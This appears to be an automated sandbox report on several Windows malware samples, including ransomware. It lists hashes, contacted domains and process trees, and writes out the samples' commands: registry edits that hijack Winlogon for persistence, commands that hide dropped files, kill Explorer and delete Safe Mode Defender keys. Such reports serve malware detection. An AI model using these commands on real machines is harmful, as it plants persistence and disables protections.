| MD5 | c06948088d05bf7a4c27e26f8ea82c90 |
| SHA1 | b4c3d89a54a1b520f8bbf29977bba0d6386c571a |
| SHA256 | fdfafef40ba0d6f1056e7ac0afe1c3d26251677047139b71981eb013cb527e8f |
| SHA512 | 81727c82841c510b95307707df83705fd0d29f02abc3ce1154df5f0e7488f6147bf598e4877d3db3a11d60e7e4e92d59c70ba99f27e4ee8f4593e50659e7fcbd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 39edc4b6de584723d24a3c4d5f312283 |
| SHA1 | 8df29ac82579d2214c69b2bcbb2c78b63489b07e |
| SHA256 | 2bf57edeb3ffe742e06e9fcc1e07a4bb25f884feb867c7d86c40dcc1c0a29653 |
| SHA512 | f0f12e9d9f9353a7627cdfd1e6d05e3f9eadb6b7c263534ca5572d9ac48ea01dc2db33b17d57fda05906bf0b2ae99b6dd6e70de819dbadfdc2a1d03e59bf2853 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 313265e2b5be1c6c1922afd32b84e940 |
| SHA1 | c704e1cd3d95fa3b97178859e1dd7c007283fd41 |
| SHA256 | 91b18beea0f2377e3fa262db4288b64ec2cbe097d0d1cf42532fe213be845863 |
| SHA512 | da896902aa2d96833bf15aa475ca1a381b46d079eca1b6b47f2be5d13b61f16d62c78a911a4df646ffe6eddeb5306e0eea881e6ca8d287414aa3b1e805b34cc8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bb6006dc311e7aa7d95cf3a7c41c27b9 |
| SHA1 | 0b0017cce366ef578778409b685de4e50571390b |
| SHA256 | fbb0043e7a50b0d48181c5b6a5a0a112f3dd097dc3f90b6b13a1993df964ee4e |
| SHA512 | 0fd99e4d1c13366c59dac33a20158219d2c0da98c9901c1f5a2866cc0d87b5c1934b3d7103c475473469b5a4b36e780fed54280c7ba7cca0bcbfda475ca89191 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0286e564040af901354aba89d4c1dd0b |
| SHA1 | 6e187aebd9b5117fdee85c71c979a3d83dcb3e1e |
| SHA256 | 68b901f760e313893ee5ed5cbc121a5c9542f2d259b749728458e4d32cefbc2a |
| SHA512 | 63873dbeb25e9fcb3714a7176d8a86d919f4420f09d6b4e0fa08fb6cee24748d46b3f1d1083aab4fbbb2f2e07af1b7f2c0b77b3b336dbf1c6aa53bf5013891fc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1e29cff10fe359626897328a7d1b0151 |
| SHA1 | 5830ea679eff816e78f30301235811aa69886ce4 |
| SHA256 | 7c60eac401001ae7c17a44e1b8bbbad42318f35536fede1d80608ce19d562fd6 |
| SHA512 | 2d933df3c68c2417ddcc9d0ff7be5d01eb12a26cc0c177e54312aa486a1dbf72f9d6ed9286ac5dbcbba1bddeba1e022d7227f3be2cc64d3e37e4f9dfd5412ac3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fd95b936fa24e519ac4a4000b0d2e7aa |
| SHA1 | c539ca0e9e086799ef31eed123620e3e1263989a |
| SHA256 | ccba8ac5a4ce7e77519ecc5f628f53f64e26e3f01af11730b024da531b9c99a6 |
| SHA512 | 1be5355f6b6591c4c7c4f08f6cfea2f266a77e5b1bcd3f0147b64fa73b75a63993999c2800e76ff7f55c838a9a782c6656e668160a2ac63a691d98691954d195 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a4335136f2af04dbdbb7be754caa16c1 |
| SHA1 | 78c7fa08aecdc599d92a7a6f0ec75358b56fe721 |
| SHA256 | e668c6433c5135d9c68a7323c64ce57f6293c4b04d3e41b65d0e3a3564f2ca81 |
| SHA512 | b627272c578b906486ff542cba3e343f7f7eca9c77a01bafbc356104b957e8a89e21cbacccfc391e1b1743e7c63b9430174b12947f2b2d809e0f54cdcbf46936 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2516 wrote to memory of 2008 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tordll.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tordll.dll,#1
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
291s
Max time network
118s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\unpack.exe" | C:\Users\Admin\AppData\Local\Temp\unpack.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Users\Admin\AppData\Local\Temp\unpack.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Users\Admin\AppData\Local\Temp\unpack.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | C:\Users\Admin\AppData\Local\Temp\unpack.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\unpack.exe" | C:\Users\Admin\AppData\Local\Temp\unpack.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\unpack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2384 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\unpack.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 2384 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\unpack.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 2384 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\unpack.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 2384 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\unpack.exe | C:\Windows\SysWOW64\taskkill.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\unpack.exe
"C:\Users\Admin\AppData\Local\Temp\unpack.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
Network
Files
memory/2384-0-0x0000000000400000-0x0000000000422000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240729-en
Max time kernel
300s
Max time network
240s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "userinit.exe,\"C:\\\\16519.exe\" 89681039647" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "userinit.exe,\"C:\\\\16519.exe\" 89681039647" | C:\Windows\SysWOW64\reg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe
"C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe" -pass -s2
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f /reg:64
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f /reg:64
Network
Files
\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
| MD5 | a26b0b3948676b82c4796c169bd043eb |
| SHA1 | 2e464f6f61b42871c1bf42d84f30ff58d7eef784 |
| SHA256 | 57d514bdcf2d47f04adf993b682bab6b9dfd150d47f3fef05541106096e6e4e5 |
| SHA512 | aa71dc61929eb477ac64153a658bad2ddc6c003989587c42abdb8d4219512a1aaa8793f66247b868b2d92722e4bd01895c084b4a219272c0f6745a55a6d0f162 |
\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
| MD5 | f052a9fa8b537c241287b4dca3c11a37 |
| SHA1 | 295eb1eeabb085e516ede2c625b5a08e9da62430 |
| SHA256 | 881a394fab156cf1d585be408aa34c979e99a1d74f3a0729c54f982cb845cd82 |
| SHA512 | 6120f0e194b2222e0a444e412b0f4d3543836f13ae0656f1a69ec61970467104e90348f836dbb6394e74b3351d00d87f3101688e011de842d71fb8ed305aee6a |
memory/2992-32-0x0000000002430000-0x0000000002458000-memory.dmp
memory/2992-31-0x0000000002430000-0x0000000002458000-memory.dmp
memory/2992-30-0x0000000002430000-0x0000000002458000-memory.dmp
memory/2992-29-0x0000000002430000-0x0000000002458000-memory.dmp
memory/2860-34-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2860-37-0x0000000000400000-0x0000000000428000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241010-en
Max time kernel
300s
Max time network
119s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
memory/2288-0-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2288-2-0x0000000000400000-0x0000000000721000-memory.dmp
memory/2288-3-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2288-23-0x0000000000400000-0x0000000000721000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240708-en
Max time kernel
292s
Max time network
264s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe, C:\\Program Files\\Common Files\\qip\\svhost.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe, C:\\Program Files\\Common Files\\qip\\svhost.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\netprotocol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe | N/A |
| N/A | N/A | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Netprotocol = "C:\\Users\\Admin\\AppData\\Roaming\\netprotocol.exe" | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\qip | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\qip\svhost.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\svhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\svhost.exe" "C:\Program Files\Common Files\qip\svhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f
C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\qip\svhost.exe"
C:\Users\Admin\AppData\Roaming\netprotocol.exe
C:\Users\Admin\AppData\Roaming\netprotocol.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\qip"
C:\Windows\SysWOW64\reg.exe
reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f
C:\Windows\SysWOW64\reg.exe
reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f
C:\Windows\SysWOW64\attrib.exe
attrib +h "C:\Program Files\Common Files\qip"
C:\Windows\SysWOW64\attrib.exe
attrib +h "C:\Program Files\Common Files\qip\svhost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hestemer.com | udp |
| US | 8.8.8.8:53 | hestemer.com | udp |
| US | 8.8.8.8:53 | aguels.com | udp |
| US | 8.8.8.8:53 | kasjchseuk.com | udp |
| US | 8.8.8.8:53 | krexjdsamdx.com | udp |
Files
memory/1748-1-0x0000000000400000-0x000000000045C000-memory.dmp
memory/1748-0-0x0000000000020000-0x0000000000022000-memory.dmp
C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
| MD5 | 7f550991510e8dd336b4321d719279b7 |
| SHA1 | 3070f320a8f184ab1193dfc8cbfde6d5f91964c3 |
| SHA256 | 905246be7f2ac87e583b541364513dd82a10e4751c615e6490ab80be6825f48c |
| SHA512 | d0b6bad92cf6d6f8a98f0f343fdc6cb6b5a1e38c0fffa4b7209e0f3677aec8ddb8d678b55c3273aa59f9924353337a898dc74d85663321cda755ff36f9f0f858 |
memory/2808-8-0x0000000000120000-0x000000000015A000-memory.dmp
memory/1748-24-0x0000000000400000-0x000000000045C000-memory.dmp
memory/2828-22-0x0000000000400000-0x000000000043A000-memory.dmp
memory/2692-21-0x0000000000270000-0x00000000002AA000-memory.dmp
memory/2692-13-0x0000000000400000-0x000000000043A000-memory.dmp
memory/2808-12-0x0000000000120000-0x000000000015A000-memory.dmp
C:\Users\Admin\AppData\Roaming\netprotocol.exe
| MD5 | c6e74cb0d7e7360d2815233db46955c8 |
| SHA1 | 02564a38bdac76485b63733636df50038f2b46c0 |
| SHA256 | b707cc9a8f323a32054401eb2e41dc88f49c727956cddb1f540793ba896cc41e |
| SHA512 | 2ef09cecec6313a5ee8b2023bb6cc2e812dd2ff7c670d2c9f7e75576f53c987cf115b84f8e2795429d431168b1c232acbea61afe00b47ed488cf03ecd9481487 |
memory/2808-25-0x0000000000120000-0x000000000015A000-memory.dmp
memory/2692-26-0x0000000000400000-0x000000000043A000-memory.dmp
memory/2828-27-0x0000000000400000-0x000000000043A000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
298s
Max time network
121s
Command Line
Signatures
Renames multiple (1213) files with added filename extension
Executes dropped EXE
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Windows\SysWOW64\reg.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\local\\svchost.exe" | C:\Windows\SysWOW64\REG.exe | N/A |
Network Share Discovery
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\ucsvcsh.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\tcpsvcss.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\tracerpts.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\csrsstub.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\ucsvcsh.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259465386 | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\__rar_0.800 | N/A | N/A |
| File opened for modification | C:\Windows\SysWOW64\dcomcnfgui.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\tracerpts.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259452984 | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\tcpsvcss.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wcmtstcsys.sss | C:\Windows\SysWOW64\dcomcnfgui.exe | N/A |
| File created | C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259445559 | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\csrsstub.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
| File created | C:\Windows\SysWOW64\dcomcnfgui.exe | C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\ps.txt.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.aes | C:\ProgramData\local\aescrypter.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.aes | C:\ProgramData\local\aescrypter.exe | N/A |
